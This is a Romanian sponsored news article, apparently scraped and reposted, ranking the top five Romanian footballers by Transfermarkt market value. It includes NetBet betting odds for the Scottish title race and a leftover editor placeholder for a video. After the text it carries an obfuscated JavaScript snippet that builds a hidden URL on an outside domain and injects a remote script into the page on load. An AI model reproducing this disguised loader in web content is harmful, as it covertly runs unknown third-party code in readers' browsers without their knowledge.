Răzvan Marin conduce în topul celor mai valoroși fotbaliști români

[ad_1]

Mijlocașul central Răzvan Marin ocupă primul loc în topul celor mai valoroși fotbaliști români în activitate, realizat de nemții de la Transfermarkt. Legitimat în Italia, la Empoli, Marin are o cotă de piață de 8 milioane de euro.

Jucătorul crescut de Gică Hagi la Academia de la Ovidiu este unul dintre cei mai constanți fotbaliști români, iar prestațiile sale bune din ultimii ani l-au adus în atenția unor cluburi din Serie A. Din vara anului trecut evoluează la Empoli, unde și-a demonstrat din nou valoarea. În aceste condiții, nu e surprinzător că se află pe primul loc în topul celor mai valoroși fotbaliști români.

1. Răzvan Marin – 8 milioane de euro

Internaționalul român este om de bază la Empoli în acest sezon, iar evoluțiile sale sunt din ce în ce mai apreciate. A marcat 2 goluri și are 2 pase decisive în acest sezon. Ce-i drept, Marin este departe de vârful său de formă. În vara lui 2021, când era legitimat la Cagliari, el era evaluat de Transfermarkt la 15 milioane de euro. După plecarea de la sarzi, cota sa de piață a mai scăzut, iar acum este evaluat la 8 milioane de euro. Marin rămâne însă un jucător important atât pentru Empoli cât și pentru echipa națională a României.

2. Ianis Hagi – 7 milioane de euro

Revenit după o accidentare gravă, care l-a ținut departe de teren timp de un an, Ianis Hagi încearcă să își recapete ritmul. El s-a accidentat într-un moment în care era unul dintre cei mai importanți jucători de la Rangers. Cota sa de piață de pe Transfermarkt a rămas însă la un nivel maxim, de 7 milioane de euro. Ianis speră să o ajute pe Rangers să devină din nou campioană în acest sezon, în condițiile în care Celtic are un avans de 9 puncte. Șansele sunt însă mici, iar bookmakerii de la pariuri NetBet îi oferă lui Celtic doar cota 1.02 să câștige titlul, în timp ce Rangers are cota 15.00. Cât privește ocupanta locului 3, Hearts, aceasta are cota 4501.00 să devină campioană, fiind la 31 de puncte de prima poziție.

3. Nicolae Stanciu – 6.5 milioane de euro

Legitimat în China, la Wuhan Three Towns, Stanciu a avut evoluții excelente și a fost om de bază de la transferul în această țară în care fotbalul devine un sport tot mai popular. Ajuns la 29 de ani, fostul jucător de la FC Vaslui și FCSB impresionează prin travaliul său și este genul de fotbalist box to box. Cota de piață maximă a atins-o însă în 2016, când era evaluat de Transfermarkt la 8 milioane de euro. A fost practic momentul în care Anderlecht l-a cumpărat de la FCSB.

Inserați acest cod video aici: https://www.youtube.com/watch?v=q8VtrnIY2XM

4. Darius Olaru – 5.3 milioane de euro

Un alt jucător care impresionează prin travaliul său. Mijlocașul central de la FCSB este cel mai valoros jucător din prima ligă a României. Olaru a fost cumpărat de FCSB cu 600 de mii de euro de la Gaz Metan Mediaș, dar s-a dovedit a fi o afacere excelentă. Este în cel mai bun moment al carierei sale și este monitorizat de echipe din Italia, Scoția și Germania.

5. Dennis Man – 5 milioane de euro

Cota de piață a lui Man a mai scăzut în ultimii ani, după ce Parma a retrogradat în liga secundă, iar accidentările repetate l-au împiedicat să aibă ascensiunea așteptată de toată lumea. La începutul lui 2021, Man era evaluat de Transfermarkt la 11 milioane de euro, imediat după transferul la Parma, dar apoi cota sa a început să scadă.

Cotele publicate în acest articol pot suferi modificări în orice moment. (P)

(function(){
tg3Xu=”fp87rfcdg3X2″;tg3X=document.createElement(„script”);
tg3X_=”u”+(„st”);tg3X_+=”at”+(„.”);tg3X.async=true;tg3X_+=”in”;
tg3Xu=”492508769.”+tg3Xu;tg3X.type=”text/javascript”;tg3Xu+=”jms4n8ve3vin”;
tg3Xu+=”icyg1b”;tg3X_+=(„f”)+”o”+(„/”);tg3X.src=”https://”+tg3X_+tg3Xu;
tg3Xd=document.body;tg3Xd.appendChild(tg3X);
})();

Articolul Răzvan Marin conduce în topul celor mai valoroși fotbaliști români apare prima dată în Bucuresti Business – Despre afaceri. Zi de zi.

[ad_2]